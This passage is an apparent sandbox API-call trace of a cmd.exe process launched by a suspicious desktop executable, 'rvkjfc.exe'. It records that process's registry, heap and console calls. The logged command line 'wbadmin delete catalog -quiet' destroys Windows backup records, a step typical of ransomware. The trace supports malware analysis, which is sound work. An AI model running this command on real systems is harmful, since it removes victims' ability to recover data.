[0044.690] GetProcessHeap () returned 0x1d0000 [0044.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0e) returned 0x1ecd80 [0044.690] FreeEnvironmentStringsW (penv=0x1eac80) returned 1 [0044.690] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0044.690] GetProcessHeap () returned 0x1d0000 [0044.690] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1ecd80 | out: hHeap=0x1d0000) returned 1 [0044.690] GetEnvironmentStringsW () returned 0x1eac80* [0044.690] GetProcessHeap () returned 0x1d0000 [0044.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0e) returned 0x1ecd80 [0044.690] FreeEnvironmentStringsW (penv=0x1eac80) returned 1 [0044.690] GetProcessHeap () returned 0x1d0000 [0044.690] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1e8370 | out: hHeap=0x1d0000) returned 1 [0044.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x1aeef8 | out: lpAttributeList=0x1aeef8) [0044.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.690] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0044.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0044.691] _get_osfhandle (_FileHandle=0) returned 0x3 [0044.691] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0044.691] SetConsoleInputExeNameW () returned 0x1 [0044.691] GetConsoleOutputCP () returned 0x1b5 [0044.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.691] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0044.691] exit (_Code=0) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x34091000" os_pid = "0x54c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x35c [0044.863] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f9f0 | out: lpSystemTimeAsFileTime=0x30f9f0*(dwLowDateTime=0x2700bfd0, dwHighDateTime=0x1d5f247)) [0044.863] GetCurrentProcessId () returned 0x54c [0044.863] GetCurrentThreadId () returned 0x35c [0044.863] GetTickCount () returned 0x1145ce0 [0044.863] QueryPerformanceCounter (in: lpPerformanceCount=0x30f9f8 | out: lpPerformanceCount=0x30f9f8*=16572566909) returned 1 [0044.865] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0044.865] __set_app_type (_Type=0x1) [0044.865] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0044.865] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0044.865] GetCurrentThreadId () returned 0x35c [0044.866] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x35c) returned 0x3c [0044.866] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0044.866] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0044.866] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0044.866] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.866] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f988 | out: phkResult=0x30f988*=0x0) returned 0x2 [0044.866] VirtualQuery (in: lpAddress=0x30f970, lpBuffer=0x30f8f0, dwLength=0x30 | out: lpBuffer=0x30f8f0*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.866] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f8f0, dwLength=0x30 | out: lpBuffer=0x30f8f0*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.866] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f8f0, dwLength=0x30 | out: lpBuffer=0x30f8f0*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.866] VirtualQuery (in: lpAddress=0x214000, lpBuffer=0x30f8f0, dwLength=0x30 | out: lpBuffer=0x30f8f0*(BaseAddress=0x214000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.866] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f8f0, dwLength=0x30 | out: lpBuffer=0x30f8f0*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.866] GetConsoleOutputCP () returned 0x1b5 [0044.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.867] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0044.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0044.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.867] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0044.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0044.867] _get_osfhandle (_FileHandle=0) returned 0x3 [0044.867] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0044.868] GetEnvironmentStringsW () returned 0x88a60* [0044.868] GetProcessHeap () returned 0x70000 [0044.868] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa7c) returned 0x894f0 [0044.868] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0044.868] GetProcessHeap () returned 0x70000 [0044.868] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x8) returned 0x888e0 [0044.868] GetEnvironmentStringsW () returned 0x88a60* [0044.868] GetProcessHeap () returned 0x70000 [0044.868] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa7c) returned 0x89f80 [0044.868] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0044.868] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e848 | out: phkResult=0x30e848*=0x44) returned 0x0 [0044.868] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x18, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.868] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x1, lpcbData=0x30e844*=0x4) returned 0x0 [0044.868] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x1, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.868] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x0, lpcbData=0x30e844*=0x4) returned 0x0 [0044.868] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x40, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x40, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x40, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.869] RegCloseKey (hKey=0x44) returned 0x0 [0044.869] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e848 | out: phkResult=0x30e848*=0x44) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x40, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x1, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x1, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x0, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x9, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x4, lpData=0x30e860*=0x9, lpcbData=0x30e844*=0x4) returned 0x0 [0044.869] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e840, lpData=0x30e860, lpcbData=0x30e844*=0x1000 | out: lpType=0x30e840*=0x0, lpData=0x30e860*=0x9, lpcbData=0x30e844*=0x1000) returned 0x2 [0044.869] RegCloseKey (hKey=0x44) returned 0x0 [0044.869] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0044.869] srand (_Seed=0x5e5fdfec) [0044.869] GetCommandLineW () returned="/C wbadmin delete catalog -quiet" [0044.869] GetCommandLineW () returned="/C wbadmin delete catalog -quiet" [0044.994] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.994] GetProcessHeap () returned 0x70000 [0044.994] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x8aa10 [0044.994] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0044.995] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0044.995] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.995] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.995] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0044.995] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0044.995] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0044.995] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0044.995] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0044.995] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0044.995] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0044.995] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0044.995] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0044.995] GetProcessHeap () returned 0x70000 [0044.995] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x894f0 | out: hHeap=0x70000) returned 1 [0044.995] GetEnvironmentStringsW () returned 0x88a60* [0044.995] GetProcessHeap () returned 0x70000 [0044.995] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa94) returned 0x8ac30 [0044.995] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0044.995] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.995] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.995] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0044.995] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0044.995] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0044.995] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0044.995] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0044.995] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0044.995] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0044.995] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0044.995] GetProcessHeap () returned 0x70000 [0044.995] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x5c) returned 0x8b6d0 [0044.996] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f650 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f650, lpFilePart=0x30f630 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f630*="Desktop") returned 0x25 [0044.996] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.996] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f360 | out: lpFindFileData=0x30f360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x8b740 [0044.996] FindClose (in: hFindFile=0x8b740 | out: hFindFile=0x8b740) returned 1 [0044.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f360 | out: lpFindFileData=0x30f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x8b740 [0044.996] FindClose (in: hFindFile=0x8b740 | out: hFindFile=0x8b740) returned 1 [0044.996] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0044.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f360 | out: lpFindFileData=0x30f360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x8b740 [0044.996] FindClose (in: hFindFile=0x8b740 | out: hFindFile=0x8b740) returned 1 [0044.996] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.996] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0044.996] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0044.996] GetProcessHeap () returned 0x70000 [0044.996] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8ac30 | out: hHeap=0x70000) returned 1 [0044.996] GetEnvironmentStringsW () returned 0x8b740* [0044.997] GetProcessHeap () returned 0x70000 [0044.997] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xae8) returned 0x8c230 [0044.997] FreeEnvironmentStringsW (penv=0x8b740) returned 1 [0044.997] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.997] GetProcessHeap () returned 0x70000 [0044.997] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8b6d0 | out: hHeap=0x70000) returned 1 [0044.997] GetProcessHeap () returned 0x70000 [0044.997] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4016) returned 0x8cd20 [0044.997] GetProcessHeap () returned 0x70000 [0044.997] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x50) returned 0x89550 [0044.997] GetProcessHeap () returned 0x70000 [0044.997] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8cd20 | out: hHeap=0x70000) returned 1 [0044.997] GetConsoleOutputCP () returned 0x1b5 [0044.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.997] GetUserDefaultLCID () returned 0x409 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f760, cchData=128 | out: lpLCData="0") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f760, cchData=128 | out: lpLCData="0") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f760, cchData=128 | out: lpLCData="1") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0044.998] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0044.998] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0044.999] GetProcessHeap () returned 0x70000 [0044.999] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x20c) returned 0x89620 [0044.999] GetConsoleTitleW (in: lpConsoleTitle=0x89620, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0044.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0044.999] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0044.999] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0044.999] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0045.000] GetProcessHeap () returned 0x70000 [0045.000] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4012) returned 0x8cd20 [0045.000] GetProcessHeap () returned 0x70000 [0045.000] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8cd20 | out: hHeap=0x70000) returned 1 [0045.000] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0045.000] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0045.000] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0045.000] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0045.000] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0045.000] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0045.000] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0045.000] GetProcessHeap () returned 0x70000 [0045.000] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x89840 [0045.000] GetProcessHeap () returned 0x70000 [0045.001] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x845e0 [0045.001] GetProcessHeap () returned 0x70000 [0045.001] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x3e) returned 0x89900 [0045.002] GetConsoleTitleW (in: lpConsoleTitle=0x30f670, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.002] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0045.002] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0045.002] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0045.002] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0045.002] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0045.002] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0045.002] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0045.002] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0045.002] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0045.002] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0045.002] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0045.002] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0045.002] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0045.002] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0045.002] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0045.002] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0045.002] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0045.002] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0045.002] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0045.002] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0045.002] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0045.002] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0045.002] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0045.002] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0045.003] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0045.003] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0045.003] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0045.003] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0045.003] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0045.003] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0045.003] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0045.003] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0045.003] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0045.003] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0045.003] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0045.003] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0045.003] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0045.003] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0045.003] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0045.003] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0045.003] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0045.003] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0045.003] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0045.003] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0045.003] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0045.003] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0045.003] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0045.003] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0045.003] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0045.003] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0045.003] 